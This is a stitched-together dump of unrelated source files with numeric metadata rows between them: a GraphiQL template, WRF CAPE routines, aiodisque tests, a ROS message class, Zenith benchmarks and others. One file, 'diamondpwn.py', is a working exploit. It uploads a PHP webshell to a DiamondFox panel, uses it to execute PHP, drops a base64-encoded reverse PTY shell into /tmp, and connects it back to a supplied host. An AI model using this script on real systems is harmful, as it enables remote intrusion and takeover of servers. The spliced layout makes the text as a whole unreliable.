src="//cdn.jsdelivr.net/npm/react-dom@16.13.1/umd/react-dom.production.min.js"></script> <script 
src="//cdn.jsdelivr.net/npm/graphiql@{{graphiql_version}}/graphiql.min.js"></script> <script src="//cdn.jsdelivr.net/npm/subscriptions-transport-ws@0.9.16/browser/client.js"></script> <script src="//cdn.jsdelivr.net/npm/graphiql-subscriptions-fetcher@0.0.2/browser/client.js"></script> </head> <body> <div id="graphiql">Loading...</div> <script> // Collect the URL parameters var parameters = {}; window.location.search.substr(1).split('&').forEach(function (entry) { var eq = entry.indexOf('='); if (eq >= 0) { parameters[decodeURIComponent(entry.slice(0, eq))] = decodeURIComponent(entry.slice(eq + 1)); } }); // Produce a Location query string from a parameter object. function locationQuery(params) { return '?' + Object.keys(params).filter(function (key) { return Boolean(params[key]); }).map(function (key) { return encodeURIComponent(key) + '=' + encodeURIComponent(params[key]); }).join('&'); } // Derive a fetch URL from the current URL, sans the GraphQL parameters. var graphqlParamNames = { query: true, variables: true, operationName: true }; var otherParams = {}; for (var k in parameters) { if (parameters.hasOwnProperty(k) && graphqlParamNames[k] !== true) { otherParams[k] = parameters[k]; } } // Configure the subscription client let subscriptionsFetcher = null; var fetchURL = locationQuery(otherParams); // Defines a GraphQL fetcher using the fetch API. function graphQLFetcher(graphQLParams, opts) { return fetch(fetchURL, { method: 'post', headers: Object.assign( { 'Accept': 'application/json', 'Content-Type': 'application/json' }, opts && opts.headers, ), body: JSON.stringify(graphQLParams), credentials: 'include', }).then(function (response) { return response.json(); }); } // When the query and variables string is edited, update the URL bar so // that it can be easily shared. 
function onEditQuery(newQuery) { parameters.query = newQuery; updateURL(); } function onEditVariables(newVariables) { parameters.variables = newVariables; updateURL(); } function onEditHeaders(newHeaders) { parameters.headers = newHeaders; updateURL(); } function onEditOperationName(newOperationName) { parameters.operationName = newOperationName; updateURL(); } function updateURL() { history.replaceState(null, null, locationQuery(parameters)); } // Render <GraphiQL /> into the body. ReactDOM.render( React.createElement(GraphiQL, { fetcher: subscriptionsFetcher || graphQLFetcher, onEditQuery: onEditQuery, onEditVariables: onEditVariables, onEditHeaders: onEditHeaders, onEditOperationName: onEditOperationName, query: {{ params.query|tojson }}, response: {{ result|tojson }}, variables: {{ params.variables|tojson }}, operationName: {{ params.operation_name|tojson }}, headers: {{params.headers or ''|tojson}}, headerEditorEnabled: true, shouldPersistHeaders: true, }), document.getElementById('graphiql') ); </script> </body> </html>"""
204.835821
22,834
0.909429
1,267
27,448
19.696922
0.75217
0.003526
0.004488
0.00545
0.015427
0.014385
0.013343
0.013343
0.010498
0.003767
0
0.130678
0.03676
27,448
133
22,835
206.37594
0.81323
0.000729
0
0.046512
0
0.077519
0.998942
0.884618
0
1
0
0
0
1
0
false
0
0
0
0.03876
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
cbdfcab58692651fca2db33522305c9f80c8182f
159
py
Python
bone-age/src/bsmu/bone_age/app/__main__.py
IvanKosik/vision
74603d4b727e6d993b562eb4656952e29173323e
[ "BSD-3-Clause" ]
2
2019-10-15T11:34:17.000Z
2021-02-03T10:46:07.000Z
bone-age/src/bsmu/bone_age/app/__main__.py
IvanKosik/vision
74603d4b727e6d993b562eb4656952e29173323e
[ "BSD-3-Clause" ]
null
null
null
bone-age/src/bsmu/bone_age/app/__main__.py
IvanKosik/vision
74603d4b727e6d993b562eb4656952e29173323e
[ "BSD-3-Clause" ]
null
null
null
"""Module that allows the user to run `python -m bsmu.bone_age.app`.""" from bsmu.bone_age.app.main import run_app if __name__ == '__main__': run_app()
19.875
71
0.698113
27
159
3.666667
0.666667
0.161616
0.222222
0.282828
0
0
0
0
0
0
0
0
0.163522
159
7
72
22.714286
0.744361
0.408805
0
0
0
0
0.090909
0
0
0
0
0
0
1
0
true
0
0.333333
0
0.333333
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
1dc4404a65d524a410bcf6734cda56c7cba90725
181
py
Python
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/nomes.py
SweydAbdul/estudos-python
b052708d0566a0afb9a1c04d035467d45f820879
[ "MIT" ]
null
null
null
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/nomes.py
SweydAbdul/estudos-python
b052708d0566a0afb9a1c04d035467d45f820879
[ "MIT" ]
null
null
null
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/nomes.py
SweydAbdul/estudos-python
b052708d0566a0afb9a1c04d035467d45f820879
[ "MIT" ]
null
null
null
nome = 'William Rodrigues' print(f'Com letras minúsculas: {nome.lower()}') print(f'Com letras maiúsculas: {nome.upper()}') print(f'Com a primeira letra maiúscula: {nome.title()}')
30.166667
56
0.712707
26
181
4.961538
0.615385
0.139535
0.209302
0.232558
0
0
0
0
0
0
0
0
0.104972
181
5
57
36.2
0.796296
0
0
0
0
0
0.756906
0
0
0
0
0
0
1
0
false
0
0
0
0
0.75
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
6
1df7463d18739b01f8ae9b8506c0ca213c7c2b94
208
py
Python
torch_geometric_signed_directed/__init__.py
huangjunjie-cs/pytorch_geometric_signed_directed-1
24b121ff4325d201b30811975bcb6f104a39dc35
[ "MIT" ]
null
null
null
torch_geometric_signed_directed/__init__.py
huangjunjie-cs/pytorch_geometric_signed_directed-1
24b121ff4325d201b30811975bcb6f104a39dc35
[ "MIT" ]
null
null
null
torch_geometric_signed_directed/__init__.py
huangjunjie-cs/pytorch_geometric_signed_directed-1
24b121ff4325d201b30811975bcb6f104a39dc35
[ "MIT" ]
null
null
null
from torch_geometric_signed_directed.nn import * from torch_geometric_signed_directed.data import * from torch_geometric_signed_directed.utils import * __all__ = [ "torch_geometric", "__version__", ]
26
51
0.802885
25
208
5.96
0.44
0.375839
0.362416
0.483221
0.724832
0.510067
0
0
0
0
0
0
0.125
208
8
52
26
0.818681
0
0
0
0
0
0.124402
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.428571
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
3804c8579b1078b89cbd844dc88b8d2aaa720cee
1,479
py
Python
tests/test_queues.py
johnnoone/aiodisque
afb6851ac907783a69b4b2e5c09456ae48a1faba
[ "MIT" ]
null
null
null
tests/test_queues.py
johnnoone/aiodisque
afb6851ac907783a69b4b2e5c09456ae48a1faba
[ "MIT" ]
null
null
null
tests/test_queues.py
johnnoone/aiodisque
afb6851ac907783a69b4b2e5c09456ae48a1faba
[ "MIT" ]
null
null
null
import pytest from aiodisque import Disque from aiodisque.queues import JobsQueue @pytest.mark.asyncio async def test_get(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) await client.addjob('q', 'job', 5000, replicate=1, retry=0) job = await queue.get() assert hasattr(job, 'id') assert hasattr(job, 'body') assert hasattr(job, 'body') assert hasattr(job, 'queue') assert not hasattr(job, 'nacks') assert not hasattr(job, 'additional_deliveries') @pytest.mark.asyncio async def test_get_nowait(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) with pytest.raises(NotImplementedError): queue.get_nowait() @pytest.mark.asyncio async def test_put(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) await queue.put('job') job = await client.getjob('q') assert hasattr(job, 'id') assert hasattr(job, 'body') assert hasattr(job, 'body') assert hasattr(job, 'queue') assert not hasattr(job, 'nacks') assert not hasattr(job, 'additional_deliveries') @pytest.mark.asyncio async def test_put_nowait(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) with pytest.raises(NotImplementedError): queue.put_nowait('job')
29.58
63
0.697769
201
1,479
5.024876
0.208955
0.106931
0.10297
0.087129
0.825743
0.825743
0.825743
0.756436
0.756436
0.756436
0
0.004914
0.174442
1,479
49
64
30.183673
0.822277
0
0
0.666667
0
0
0.065585
0.028398
0
0
0
0
0.307692
1
0
false
0
0.076923
0
0.076923
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
382e106276e9be7114e099ce4bb8c7a7c95a2b47
340
py
Python
datasets/plugins/__init__.py
talebzeghmi/datasets
db04bdcdbc7b782eae54991571181badea5e4c7a
[ "Apache-2.0" ]
null
null
null
datasets/plugins/__init__.py
talebzeghmi/datasets
db04bdcdbc7b782eae54991571181badea5e4c7a
[ "Apache-2.0" ]
null
null
null
datasets/plugins/__init__.py
talebzeghmi/datasets
db04bdcdbc7b782eae54991571181badea5e4c7a
[ "Apache-2.0" ]
null
null
null
# isort: skip_file # flake8: noqa: F401 from datasets.plugins.executors.metaflow_executor import MetaflowExecutor from datasets.plugins.batch.batch_dataset_plugin import BatchDatasetPlugin from datasets.plugins.batch.batch_flow_dataset_plugin import BatchFlowDatasetPlugin from datasets.plugins.register_plugins import register register()
37.777778
83
0.873529
41
340
7.04878
0.512195
0.16609
0.262976
0.16609
0.200692
0
0
0
0
0
0
0.012698
0.073529
340
8
84
42.5
0.904762
0.102941
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.8
0
0.8
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
697ca0d1f3efb545a4526819889ead2a821a811a
8,940
py
Python
src/wrf/g_cape.py
khallock/wrf-python
9c5825c101722e7eddece2ca13cc8e9d9f96a21e
[ "Apache-2.0" ]
1
2018-10-30T18:06:26.000Z
2018-10-30T18:06:26.000Z
src/wrf/g_cape.py
mostamndi/wrf-python
3806bcdd01b31fa67da980eafefa0d1245faf6a6
[ "Apache-2.0" ]
null
null
null
src/wrf/g_cape.py
mostamndi/wrf-python
3806bcdd01b31fa67da980eafefa0d1245faf6a6
[ "Apache-2.0" ]
null
null
null
from __future__ import (absolute_import, division, print_function) import numpy as np import numpy.ma as ma from .extension import _tk, _cape from .destag import destagger from .constants import default_fill, Constants, ConversionFactors from .util import extract_vars from .metadecorators import set_cape_metadata @set_cape_metadata(is2d=True) def get_2dcape(wrfin, timeidx=0, method="cat", squeeze=True, cache=None, meta=True, _key=None, missing=default_fill(np.float64)): """Return the 2d fields of MCAPE, MCIN, LCL, and LFC. The leftmost dimension of the returned array represents four different quantities: - return_val[0,...] will contain MCAPE [J kg-1] - return_val[1,...] will contain MCIN [J kg-1] - return_val[2,...] will contain LCL [m] - return_val[3,...] will contain LFC [m] This functions extracts the necessary variables from the NetCDF file object in order to perform the calculation. Args: wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \ iterable): WRF-ARW NetCDF data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile` or an iterable sequence of the aforementioned types. timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The desired time index. This value can be a positive integer, negative integer, or :data:`wrf.ALL_TIMES` (an alias for None) to return all times in the file or sequence. The default is 0. method (:obj:`str`, optional): The aggregation method to use for sequences. Must be either 'cat' or 'join'. 'cat' combines the data along the Time dimension. 'join' creates a new dimension for the file index. The default is 'cat'. squeeze (:obj:`bool`, optional): Set to False to prevent dimensions with a size of 1 from being automatically removed from the shape of the output. Default is True. cache (:obj:`dict`, optional): A dictionary of (varname, ndarray) that can be used to supply pre-extracted NetCDF variables to the computational routines. 
It is primarily used for internal purposes, but can also be used to improve performance by eliminating the need to repeatedly extract the same variables used in multiple diagnostics calculations, particularly when using large sequences of files. Default is None. meta (:obj:`bool`, optional): Set to False to disable metadata and return :class:`numpy.ndarray` instead of :class:`xarray.DataArray`. Default is True. _key (:obj:`int`, optional): A caching key. This is used for internal purposes only. Default is None. missing (:obj:`float`): The fill value to use for the output. Default is :data:`wrf.default_fill(np.float64)`. Returns: :class:`xarray.DataArray` or :class:`numpy.ndarray`: The cape, cin, lcl, and lfc values as an array whose leftmost dimension is 4 (0=CAPE, 1=CIN, 2=LCL, 3=LFC). If xarray is enabled and the *meta* parameter is True, then the result will be a :class:`xarray.DataArray` object. Otherwise, the result will be a :class:`numpy.ndarray` object with no metadata. """ varnames = ("T", "P", "PB", "QVAPOR", "PH","PHB", "HGT", "PSFC") ncvars = extract_vars(wrfin, timeidx, varnames, method, squeeze, cache, meta=False, _key=_key) t = ncvars["T"] p = ncvars["P"] pb = ncvars["PB"] qv = ncvars["QVAPOR"] ph = ncvars["PH"] phb = ncvars["PHB"] ter = ncvars["HGT"] psfc = ncvars["PSFC"] full_t = t + Constants.T_BASE full_p = p + pb tk = _tk(full_p, full_t) geopt = ph + phb geopt_unstag = destagger(geopt, -3) z = geopt_unstag/Constants.G # Convert pressure to hPa p_hpa = ConversionFactors.PA_TO_HPA * full_p psfc_hpa = ConversionFactors.PA_TO_HPA * psfc i3dflag = 0 ter_follow = 1 cape_cin = _cape(p_hpa, tk, qv, z, ter, psfc_hpa, missing, i3dflag, ter_follow) left_dims = cape_cin.shape[1:-3] right_dims = cape_cin.shape[-2:] resdim = (4,) + left_dims + right_dims # Make a new output array for the result result = np.zeros(resdim, cape_cin.dtype) # Cape 2D output is not flipped in the vertical, so index from the # end result[0,...,:,:] = cape_cin[0,...,-1,:,:] 
result[1,...,:,:] = cape_cin[1,...,-1,:,:] result[2,...,:,:] = cape_cin[1,...,-2,:,:] result[3,...,:,:] = cape_cin[1,...,-3,:,:] return ma.masked_values(result, missing) @set_cape_metadata(is2d=False) def get_3dcape(wrfin, timeidx=0, method="cat", squeeze=True, cache=None, meta=True, _key=None, missing=default_fill(np.float64)): """Return the three-dimensional CAPE and CIN. The leftmost dimension of the returned array represents two different quantities: - return_val[0,...] will contain CAPE [J kg-1] - return_val[1,...] will contain CIN [J kg-1] This functions extracts the necessary variables from the NetCDF file object in order to perform the calculation. Args: wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \ iterable): WRF-ARW NetCDF data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile` or an iterable sequence of the aforementioned types. timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The desired time index. This value can be a positive integer, negative integer, or :data:`wrf.ALL_TIMES` (an alias for None) to return all times in the file or sequence. The default is 0. method (:obj:`str`, optional): The aggregation method to use for sequences. Must be either 'cat' or 'join'. 'cat' combines the data along the Time dimension. 'join' creates a new dimension for the file index. The default is 'cat'. squeeze (:obj:`bool`, optional): Set to False to prevent dimensions with a size of 1 from being automatically removed from the shape of the output. Default is True. cache (:obj:`dict`, optional): A dictionary of (varname, ndarray) that can be used to supply pre-extracted NetCDF variables to the computational routines. It is primarily used for internal purposes, but can also be used to improve performance by eliminating the need to repeatedly extract the same variables used in multiple diagnostics calculations, particularly when using large sequences of files. Default is None. 
meta (:obj:`bool`, optional): Set to False to disable metadata and return :class:`numpy.ndarray` instead of :class:`xarray.DataArray`. Default is True. _key (:obj:`int`, optional): A caching key. This is used for internal purposes only. Default is None. missing (:obj:`float`): The fill value to use for the output. Default is :data:`wrf.default_fill(np.float64)`. Returns: :class:`xarray.DataArray` or :class:`numpy.ndarray`: The CAPE and CIN as an array whose leftmost dimension is 2 (0=CAPE, 1=CIN). If xarray is enabled and the *meta* parameter is True, then the result will be a :class:`xarray.DataArray` object. Otherwise, the result will be a :class:`numpy.ndarray` object with no metadata. """ varnames = ("T", "P", "PB", "QVAPOR", "PH", "PHB", "HGT", "PSFC") ncvars = extract_vars(wrfin, timeidx, varnames, method, squeeze, cache, meta=False, _key=_key) t = ncvars["T"] p = ncvars["P"] pb = ncvars["PB"] qv = ncvars["QVAPOR"] ph = ncvars["PH"] phb = ncvars["PHB"] ter = ncvars["HGT"] psfc = ncvars["PSFC"] full_t = t + Constants.T_BASE full_p = p + pb tk = _tk(full_p, full_t) geopt = ph + phb geopt_unstag = destagger(geopt, -3) z = geopt_unstag/Constants.G # Convert pressure to hPa p_hpa = ConversionFactors.PA_TO_HPA * full_p psfc_hpa = ConversionFactors.PA_TO_HPA * psfc i3dflag = 1 ter_follow = 1 cape_cin = _cape(p_hpa, tk, qv, z, ter, psfc_hpa, missing, i3dflag, ter_follow) return ma.masked_values(cape_cin, missing)
39.210526
80
0.600895
1,179
8,940
4.473282
0.195081
0.023891
0.01934
0.015169
0.845468
0.843003
0.843003
0.81532
0.787637
0.787637
0
0.010863
0.299776
8,940
228
81
39.210526
0.831629
0.623154
0
0.619718
0
0
0.03281
0
0
0
0
0
0
1
0.028169
false
0
0.112676
0
0.169014
0.014085
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
69972a915cdf9c88c71fa8302c0e2d231ece3ffc
1,020
py
Python
alpyro_msgs/control_msgs/pointheadactionresult.py
rho2/alpyro_msgs
b5a680976c40c83df70d61bb2db1de32a1cde8d3
[ "MIT" ]
1
2020-12-13T13:07:10.000Z
2020-12-13T13:07:10.000Z
alpyro_msgs/control_msgs/pointheadactionresult.py
rho2/alpyro_msgs
b5a680976c40c83df70d61bb2db1de32a1cde8d3
[ "MIT" ]
null
null
null
alpyro_msgs/control_msgs/pointheadactionresult.py
rho2/alpyro_msgs
b5a680976c40c83df70d61bb2db1de32a1cde8d3
[ "MIT" ]
null
null
null
from typing import Final from alpyro_msgs import RosMessage from alpyro_msgs.actionlib_msgs.goalstatus import GoalStatus from alpyro_msgs.control_msgs.pointheadresult import PointHeadResult from alpyro_msgs.std_msgs.header import Header class PointHeadActionResult(RosMessage): __msg_typ__ = "control_msgs/PointHeadActionResult" __msg_def__ = "c3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogIHVpbnQzMiBzZXEKICB0aW1lIHN0YW1wCiAgc3RyaW5nIGZyYW1lX2lkCmFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgdWludDggUEVORElORz0wCiAgdWludDggQUNUSVZFPTEKICB1aW50OCBQUkVFTVBURUQ9MgogIHVpbnQ4IFNVQ0NFRURFRD0zCiAgdWludDggQUJPUlRFRD00CiAgdWludDggUkVKRUNURUQ9NQogIHVpbnQ4IFBSRUVNUFRJTkc9NgogIHVpbnQ4IFJFQ0FMTElORz03CiAgdWludDggUkVDQUxMRUQ9OAogIHVpbnQ4IExPU1Q9OQogIGFjdGlvbmxpYl9tc2dzL0dvYWxJRCBnb2FsX2lkCiAgICB0aW1lIHN0YW1wCiAgICBzdHJpbmcgaWQKICB1aW50OCBzdGF0dXMKICBzdHJpbmcgdGV4dApjb250cm9sX21zZ3MvUG9pbnRIZWFkUmVzdWx0IHJlc3VsdAoK" __md5_sum__ = "1eb06eeff08fa7ea874431638cb52332" header: Header status: GoalStatus result: PointHeadResult
63.75
570
0.927451
53
1,020
17.415094
0.45283
0.043337
0.060672
0
0
0
0
0
0
0
0
0.085744
0.05098
1,020
15
571
68
0.867769
0
0
0
0
0
0.605882
0.605882
0
1
0
0
0
1
0
false
0
0.416667
0
1
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
1
0
1
0
0
6
69a849b0b0d31685236e4b7817251ac307df64d4
4,391
py
Python
Vault7/Xiphos/DiamondFox/diamondpwn.py
dendisuhubdy/grokmachine
120a21a25c2730ed356739231ec8b99fc0575c8b
[ "BSD-3-Clause" ]
46
2017-05-15T11:15:08.000Z
2018-07-02T03:32:52.000Z
Vault7/Xiphos/DiamondFox/diamondpwn.py
dendisuhubdy/grokmachine
120a21a25c2730ed356739231ec8b99fc0575c8b
[ "BSD-3-Clause" ]
null
null
null
Vault7/Xiphos/DiamondFox/diamondpwn.py
dendisuhubdy/grokmachine
120a21a25c2730ed356739231ec8b99fc0575c8b
[ "BSD-3-Clause" ]
24
2017-05-17T03:26:17.000Z
2018-07-09T07:00:50.000Z
#!/usr/bin/python2 # coding: utf-8 import requests import sys clear = "\x1b[0m" blue = "\x1b[1;34m" cyan = "\x1b[1;36m" red = "\x1b[1;31m" green = "\x1b[1;32m" def upload_shell(base_url): files={'upload1':('file.log.php', "<?php @assert(filter_input(0,woot,516)); ?>")} data={'slots': '1'} url = base_url + "/post.php" sys.stdout.write(cyan+"{*} Attempting shell upload..."+clear) sys.stdout.flush() try: requests.post(url=url, files=files, data=data) except Exception, e: sys.stdout.write(red+" [failed]\n"+clear) sys.stdout.flush() sys.exit("Stack Trace: \n%s" %(str(e))) try: output = execute_php(base_url=base_url, php="print md5('pwned');") except Exception, e: sys.stdout.write(red+" [failed]\n"+clear) sys.stdout.flush() sys.exit("Stack Trace: \n%s" %(str(e))) if "5e93de3efa544e85dcd6311732d28f95" in output: sys.stdout.write(green+" [success]\n"+clear) def upload_backconnect(base_url): sys.stdout.write(cyan+"{*} Uploading Backconnect..."+clear) encoded_shell = "IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiA
gICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK" cbdrop = """$hack = "%s";$x = fopen("/tmp/x", "w+");fwrite($x, base64_decode($hack));fclose($x);echo "dongs";""" %(encoded_shell) lol = execute_php(base_url, php=php_encoder(cbdrop)) if "dongs" in lol: sys.stdout.write(green+" [done]\n"+clear) def execute_php(base_url, php): shell_url = base_url + "/logs/dump/file.log.php" data={'woot': php} r = requests.post(url=shell_url, data=data) return r.text def php_encoder(php): encoded = php.encode('base64') encoded = encoded.replace("\n", "") encoded = encoded.strip() code = "eval(base64_decode('%s'));" %(encoded) return code def pop_reverse(base_url, cb_host, cb_port): upload_shell(base_url) upload_backconnect(base_url) print "%s{*} Sending backconnect to %s%s:%s%s" %(cyan, green, cb_host, cb_port, clear) execute_php(base_url, php="system('python /tmp/x %s %s');" %(cb_host, cb_port)) print "%s{$} bl1ngbl1ng!!%s" %(blue, clear) def main(args): if len(args) != 4: sys.exit("use: %s 
http://bot.net/Panel hacke.rs 31337" %(args[0])) pop_reverse(base_url=args[1], cb_host=args[2], cb_port=args[3]) if __name__ == "__main__": main(args=sys.argv)
65.537313
2,106
0.800501
340
4,391
10.197059
0.35
0.026247
0.024228
0.019614
0.064609
0.047303
0.047303
0.047303
0.047303
0.047303
0
0.072599
0.096561
4,391
66
2,107
66.530303
0.801361
0.00706
0
0.192982
0
0.017544
0.618632
0.513079
0
1
0
0
0.017544
0
null
null
0
0.035088
null
null
0.052632
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
1
null
1
0
0
0
1
0
0
0
0
0
0
0
0
6
69c29d675a3901f6528dc709efd71ea6ba298177
241
py
Python
brainless/__init__.py
loaiabdalslam/Brainless
d363e0d713fc9b024a4fac990b9c39cd59769454
[ "MIT" ]
1
2020-02-28T12:12:21.000Z
2020-02-28T12:12:21.000Z
brainless/__init__.py
loaiabdalslam/Brainless
d363e0d713fc9b024a4fac990b9c39cd59769454
[ "MIT" ]
null
null
null
brainless/__init__.py
loaiabdalslam/Brainless
d363e0d713fc9b024a4fac990b9c39cd59769454
[ "MIT" ]
null
null
null
from brainless._version import __version__ from brainless.predictor import Predictor from brainless.utils_models import load_ml_model from brainless.algorithm.classifier import Classifier from brainless.algorithm.regressor import Regressor
34.428571
53
0.883817
30
241
6.833333
0.433333
0.317073
0.214634
0
0
0
0
0
0
0
0
0
0.087137
241
6
54
40.166667
0.931818
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0e0457ccab9ce4536a0cf6a29b6919ac41da1609
5,338
py
Python
test_runner/performance/test_parallel_copy_to.py
libzenith/zenith
4b3b19f4448f650b918230d972e2ec68815dcbdb
[ "ECL-2.0", "Apache-2.0" ]
189
2021-03-30T13:09:46.000Z
2022-03-22T15:34:38.000Z
test_runner/performance/test_parallel_copy_to.py
zenithdb/zenith
4b3b19f4448f650b918230d972e2ec68815dcbdb
[ "ECL-2.0", "Apache-2.0" ]
991
2021-04-05T14:37:16.000Z
2022-03-31T23:11:03.000Z
test_runner/performance/test_parallel_copy_to.py
zenithdb/zenith
4b3b19f4448f650b918230d972e2ec68815dcbdb
[ "ECL-2.0", "Apache-2.0" ]
18
2021-04-06T04:05:50.000Z
2022-03-07T18:05:51.000Z
from io import BytesIO import asyncio import asyncpg from fixtures.zenith_fixtures import ZenithEnv, Postgres from fixtures.log_helper import log from fixtures.benchmark_fixture import MetricReport, ZenithBenchmarker pytest_plugins = ("fixtures.zenith_fixtures", "fixtures.benchmark_fixture") async def repeat_bytes(buf, repetitions: int): for i in range(repetitions): yield buf async def copy_test_data_to_table(pg: Postgres, worker_id: int, table_name: str): buf = BytesIO() for i in range(1000): buf.write( f"{i}\tLoaded by worker {worker_id}. Long string to consume some space.\n".encode()) buf.seek(0) copy_input = repeat_bytes(buf.read(), 5000) pg_conn = await pg.connect_async() await pg_conn.copy_to_table(table_name, source=copy_input) async def parallel_load_different_tables(pg: Postgres, n_parallel: int): workers = [] for worker_id in range(n_parallel): worker = copy_test_data_to_table(pg, worker_id, f'copytest_{worker_id}') workers.append(asyncio.create_task(worker)) # await all workers await asyncio.gather(*workers) # Load 5 different tables in parallel with COPY TO def test_parallel_copy_different_tables(zenith_simple_env: ZenithEnv, zenbenchmark: ZenithBenchmarker, n_parallel=5): env = zenith_simple_env # Create a branch for us env.zenith_cli(["branch", "test_parallel_copy_different_tables", "empty"]) pg = env.postgres.create_start('test_parallel_copy_different_tables') log.info("postgres is running on 'test_parallel_copy_different_tables' branch") # 